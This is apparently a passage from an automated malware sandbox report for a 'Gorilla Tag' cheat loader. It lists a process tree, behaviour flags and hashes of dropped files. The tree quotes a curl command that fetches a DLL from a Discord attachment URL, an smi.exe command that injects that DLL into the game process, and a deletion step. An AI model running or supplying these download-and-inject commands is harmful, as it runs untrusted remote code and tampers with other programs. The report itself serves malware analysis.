- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c curl -s https://cdn.discordapp.com/attachments/1131984990788390924/1145857484809064498/TestMenu.dll --output C:\Users\Admin\AppData\Local\Temp\DSULOU.dll2⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\SysWOW64\curl.execurl -s https://cdn.discordapp.com/attachments/1131984990788390924/1145857484809064498/TestMenu.dll --output C:\Users\Admin\AppData\Local\Temp\DSULOU.dll3⤵PID:4516
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c smi.exe inject -p "Gorilla Tag" -a C:\Users\Admin\AppData\Local\Temp\DSULOU.dll -n TestMenu.Mods -c Loader -m Load2⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Users\Admin\Downloads\Quantum\Debug\smi.exesmi.exe inject -p "Gorilla Tag" -a C:\Users\Admin\AppData\Local\Temp\DSULOU.dll -n TestMenu.Mods -c Loader -m Load3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1140 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1140 -s 8404⤵
- Program crash
PID:4000
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\DSULOU.dll2⤵PID:2792
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Quantum\Debug\New Text Document.txt1⤵PID:4748
-
C:\Users\Admin\Downloads\Quantum\ExtremeDumper\Gorilla Tag.exe"C:\Users\Admin\Downloads\Quantum\ExtremeDumper\Gorilla Tag.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3716
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 1140 -ip 11401⤵PID:4424
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
180KB
MD5497835d373e12af4cd257487dd5d3612
SHA1425950e9427926ac0aa7940c4a18a44ab59df47a
SHA256e11ff08dff0a884b311133e2469146b2a54319cf60094511e098df0c3677c4e0
SHA512aa05611f56185e02289345f9c286ca98f96d5e1d24c8d152605e866e60013dc2945fc60f826e81459003ca9c2b7d439c0f6fdd173cbee57cd751ee51b18d2bf7
-
Filesize
4KB
MD50831f856b1b30a6011188b0201d83582
SHA134a88660673eb91930a695cf50d51e6d42fcd456
SHA2568a2b660a6b5ac292aef88b55524c689647e9f7393fd3d707ce57ee995973d48b
SHA5122db9112c9e4414925a4ebbdc40a2c47d8d665cb833e11faddb3324a05d453dafe6c1dbb64f946bbb93b441993268d636c8e10473ef407a5682d171da27ff1dae
-
Filesize
1KB
MD5e103aceaac824717b6382460669c3032
SHA1fd03a48a8949a59f3bb368c831d7d65c1ec370db
SHA256707f7728de897eb2a0176ebe3b233b2123124d5d0747fb8764296813cb139f69
SHA5128c8b5fe57965fd327835425b7941493295672909580c264d09126504104c7a4507f569a7d45757a3fb8b23fd9a8d57cafec5eb2e575107e96fbfce6bdd481313
-
Filesize
371B
MD5b27c0a3ab762c1cd8304d1b2485b0352
SHA111fb32bd5dee50e86b9a29c3c2839f0dce13f5cb
SHA256d9038cd9a3596ae02f75a40894140503c21c8b0d417060cfc3514eb89a053d80
SHA5123f073a29368423960607a3d6ed2f3c4bd8d4a8723dd36f91d072b901f1839463dc9458d29272e863ca54d56253601760fbfc56572b2944104fa1654fe2103fe6
-
Filesize
1KB
MD5299e4b3ef5eb6f408b9f08e22b7e55d8
SHA1d016718c3c3b85451aff3f3aaa7d20401d2b7cb7
SHA2564619ea3e8facd0a6ba7706e778df47990f2ce8e4a066c60aa7cd98ff033628d3
SHA51266beab496b6c4fce47bd66ee7b393dfb151acc0bb554bcad448d5d09bd17fe56efa3b0b4fa6232a9b1738cb27a2f63d528ed8bc4a6a4f8b9f1772d0e0ca8c9c5
-
C:\Users\Admin\AppData\Local\Temp\Costura\CFA0B0B143E4C50194769B9A2552FFEF\64\extremedumper.loaderhook.dll
Filesize211KB
MD52e40ed16499ba8ff681b9bfe8263cef8
SHA1f89f7d11dc028bb3fa1437b0d0de1affec35f8a1
SHA2563577492fff8cd1dfdfae86f74e3d77a1aa672b49d18838355ce2a5bf86363f47
SHA5122f47d4a9f7ec6a7f7eaf605e571c85ba16b4421df9a15c801502af6488287f9ed6c5e7f3c2b29ae2b4f6169252d9ac9a7b91bc666557fa1501347b7de36493a1
-
Filesize
68KB
MD59db6fbea3a07d135277d873d87159b24
SHA149ce632a03e181b506ae1fb71889b57b71dc02a7
SHA256584b29b8c789d0d277a4b914594f93182a5e2777fcaf7c505c02b533dabbbb66
SHA5120079eb6455df3e069b80727a1df7bc56fd101a491e7b4f895695269de3d15401c254f150886672a1d0a985487c5fd8a41a35fb1ab0a00457e5ad33566731e50f
-
Filesize
213KB
MD5e528b272ad697406a5e9b7cb974b83dc
SHA1f7394c3e500c9b9e3c2b26bd298c6c4a23e81790
SHA2569faa634b5818ea8b6f90a7788854f5b0d850cdf57435b4c64938675204c61394
SHA512054fba8477ae730b04937502af6875c7d20b08e41e97b536cf1ce269ddc2ac5efaaf1d1a054a3910d1b4922377dbf54b466949fda00d7f02446de88d34cf9537
-
Filesize
213KB
MD5e528b272ad697406a5e9b7cb974b83dc
SHA1f7394c3e500c9b9e3c2b26bd298c6c4a23e81790
SHA2569faa634b5818ea8b6f90a7788854f5b0d850cdf57435b4c64938675204c61394
SHA512054fba8477ae730b04937502af6875c7d20b08e41e97b536cf1ce269ddc2ac5efaaf1d1a054a3910d1b4922377dbf54b466949fda00d7f02446de88d34cf9537
-
Filesize
184B
MD5cc46a0995713ba7cb577b4bbbedf83e8
SHA16cc50a0e444e33f65d42423195ed045a3a55daf8
SHA2565fe1ad802f68d7c47dbbd8e60162ba88abaed162da5d381c85d3e4935311962e
SHA51236f5b3acbc520504cfe56e5fe19de2a22ae3d2ddddb4c0eb3e441f884033077fb411e69976c3e250c3ef01189d0e48016bde67a73a0dbc950dd5d8ec7783fd2a
-
Filesize
41B
MD5bac7d2534f8a90ee890363c5929cbd85
SHA1de82f797ab163303fb1c90216763d740ce65c202
SHA2561bc43d792689d052c510ef55ff63ec7f56bd5281cae944652442e29f3ea97412
SHA512d587c5a4f5c36f2624939b5cf4a58625aa782cfda5726d0997e03e6394a401474fab043ba389e071b1471586274915a42af2e750fb06e742ab3d465ff23ce670
-
Filesize
22KB
MD5d0caeafbe77a7b08017d5bd02060d0f3
SHA12e24c4a0ae534837f5925d1b9ba82e1d99c7710f
SHA25623bc482d9451a546ffb84a0fb249df51f90e8ec8bf263efbcddd84557cf9fe62
SHA5125874912d9ebacfc3873e7069cb247083cbcf62d07be3292eb00d8702e851acee44d4621af31533b7d616e3fc3217891b7aaa00911fafd1fac32bde45e5eba566
-
Filesize
9KB
MD5c0a17812234aae6cd4365c67ec39a842
SHA10c141a692d0f67cc1c62dac14f303d4b1447187e
SHA25612237476dfd8719929253c316091079d37d7ee8c6f630020b2b0a9996b036764
SHA51284452a8b7e70abf4d2131f7fc451589b5aede332360b3834537bff012394be4f9e289fc893064027869cbda9d53cfe7c7793228c3adc98552ed5e30a8e4e4cae
-
Filesize
9KB
MD5c0a17812234aae6cd4365c67ec39a842
SHA10c141a692d0f67cc1c62dac14f303d4b1447187e
SHA25612237476dfd8719929253c316091079d37d7ee8c6f630020b2b0a9996b036764
SHA51284452a8b7e70abf4d2131f7fc451589b5aede332360b3834537bff012394be4f9e289fc893064027869cbda9d53cfe7c7793228c3adc98552ed5e30a8e4e4cae
-
Filesize
1.7MB
MD558db100b228ff17f83726d4c2738990e
SHA1d69bfa9ddb32de1999760e8b3b3236bc8934d66c
SHA256f407b67a008fc2186329d5feffe830f7eead7a11f3b169d0d90099495edfcf2e
SHA512e845a62e00fcb8305ab0ceececec73a2d46a490c04370742290398f5e568ba4cf43bc1caa0529405e9ee07c021a05109873271278a8c45eec67ad409dd670f51
-
Filesize
1.7MB
MD558db100b228ff17f83726d4c2738990e
SHA1d69bfa9ddb32de1999760e8b3b3236bc8934d66c
SHA256f407b67a008fc2186329d5feffe830f7eead7a11f3b169d0d90099495edfcf2e
SHA512e845a62e00fcb8305ab0ceececec73a2d46a490c04370742290398f5e568ba4cf43bc1caa0529405e9ee07c021a05109873271278a8c45eec67ad409dd670f51